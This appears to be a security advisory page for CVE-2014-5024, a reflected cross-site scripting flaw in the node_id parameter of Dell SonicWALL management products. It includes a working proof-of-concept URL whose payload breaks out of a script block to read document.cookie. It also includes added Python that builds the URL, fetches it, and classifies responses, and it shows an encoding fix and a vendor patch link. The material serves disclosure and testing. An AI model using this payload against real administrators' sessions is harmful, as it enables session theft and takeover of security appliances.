Cross-site scripting vulnerability in the 'node_id' parameter of multiple Dell SonicWALL products
Release date:
Updated on:
Affected Systems:
SonicWALL GMS/Analyzer/UMA
Description:
--------------------------------------------------------------------------------
Bugtraq id: 68829
CVE (CAN) ID: CVE-2014-5024
SonicWALL provides Internet security solutions for small and medium-sized businesses and distributed enterprises.
Dell SonicWALL Global Management System (GMS), Dell SonicWALL Analyzer, and Dell SonicWALL Universal Management Appliance (UMA) contain a reflected cross-site scripting vulnerability. The "node_id" parameter of the page "/sgms/panelManager?Level=1&typeOfUnits=2&node_name=GlobalView&node_id=(XSS HERE)" is echoed back into the response without being encoded, so an attacker who gets an authenticated administrator to open a crafted link can run arbitrary script in that administrator's browser session on the management interface and steal the session's authentication cookies.
<* Source: William Costa
Link: http://seclists.org/fulldisclosure/2014/Jul/125
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
http://www.example.com:8443/sgms/panelManager?Level=1&typeOfUnits=2&node_name=GlobalView&node_id=aaaaaaa'</script><body onload=alert(document.cookie)>&panelidz=0,4#tabs-4
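As an added check covering the description and the test method above (example code written for this page; it is not from the advisory, from William Costa's post, or from Dell SonicWALL): it builds the proof-of-concept URL with a properly percent-encoded query string so the quote, "<" and ">" reach the server intact, and classifies a response body as vulnerable, encoded, or not reflected. Because the payload is a quote followed by </script>, the example assumes node_id is echoed into a single-quoted JavaScript string inside a <script> block; render_vulnerable and render_hardened are constructed stand-ins for that page (not the real JSP), and js_string_encode shows the kind of context-aware encoding that neutralizes the breakout. The names build_poc_url, fetch, classify and the two render functions are this example's own.

```python
"""Check for the reflected XSS in the node_id parameter of
/sgms/panelManager (CVE-2014-5024).

Added example; not code from the advisory, from William Costa's post or
from Dell SonicWALL. It assumes the parameter is echoed into a
single-quoted JavaScript string inside a <script> block, which is what
the advisory's payload (a quote followed by </script>) is built to break
out of. The render_* functions are constructed stand-ins for the real
page; the bodies they produce are not captured from an appliance.
"""
import ssl
import urllib.parse
import urllib.request

# Payload taken from the advisory's test method.
PAYLOAD = "aaaaaaa'</script><body onload=alert(document.cookie)>"
PATH = "/sgms/panelManager"


def build_poc_url(base, payload=PAYLOAD):
    """Build the advisory's test URL with a percent-encoded query string
    so the quote, '<' and '>' survive the HTTP layer intact."""
    params = [
        ("Level", "1"),
        ("typeOfUnits", "2"),
        ("node_name", "GlobalView"),
        ("node_id", payload),
        ("panelidz", "0,4"),
    ]
    return f"{base.rstrip('/')}{PATH}?{urllib.parse.urlencode(params)}#tabs-4"


def fetch(url, timeout=10):
    """Fetch url and return its body as text. Certificate checks are
    disabled because management appliances commonly use self-signed
    certificates; only use this against systems you are authorized to test."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(url, timeout=timeout, context=ctx) as resp:
        return resp.read().decode("utf-8", "replace")


def js_string_encode(value):
    """Encode value for a JavaScript string literal: every character
    outside ASCII [A-Za-z0-9] becomes \\uXXXX, so neither a quote nor the
    sequence </script> can terminate the literal or the script block."""
    return "".join(
        c if c.isascii() and c.isalnum() else f"\\u{ord(c):04x}" for c in value
    )


def render_vulnerable(node_id):
    """Stand-in for the unpatched page: the parameter is concatenated
    into the script verbatim (constructed; not the real JSP)."""
    return (
        "<html><head><script>\n"
        f"var nodeId = '{node_id}';\n"
        "</script></head><body>GlobalView</body></html>"
    )


def render_hardened(node_id):
    """Same page with the parameter encoded for the JS string context."""
    return (
        "<html><head><script>\n"
        f"var nodeId = '{js_string_encode(node_id)}';\n"
        "</script></head><body>GlobalView</body></html>"
    )


def classify(body, payload=PAYLOAD):
    """'vulnerable' if the payload is echoed verbatim (the </script>
    breakout works), 'encoded' if the harmless marker prefix is present
    but the metacharacters are not, 'not reflected' otherwise."""
    if payload in body:
        return "vulnerable"
    marker = payload.split("'")[0]  # the harmless prefix: aaaaaaa
    if marker in body:
        return "encoded"
    return "not reflected"


if __name__ == "__main__":
    print(build_poc_url("https://www.example.com:8443"))
    for name, page in (("vulnerable", render_vulnerable(PAYLOAD)),
                       ("hardened", render_hardened(PAYLOAD))):
        print(f"{name}: {classify(page)}")
```

Against a live system you are authorized to test, pass fetch(build_poc_url("https://host:8443")) to classify(); a "vulnerable" result means the quote and </script> came back unencoded, which is exactly the condition the advisory's payload relies on. An "encoded" result is what the vendor's fix should produce, since the parameter is still reflected but can no longer close the script block.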
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
SonicWALL
---------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
https://support.software.dell.com/product-notification/128245
Permanent link to this article: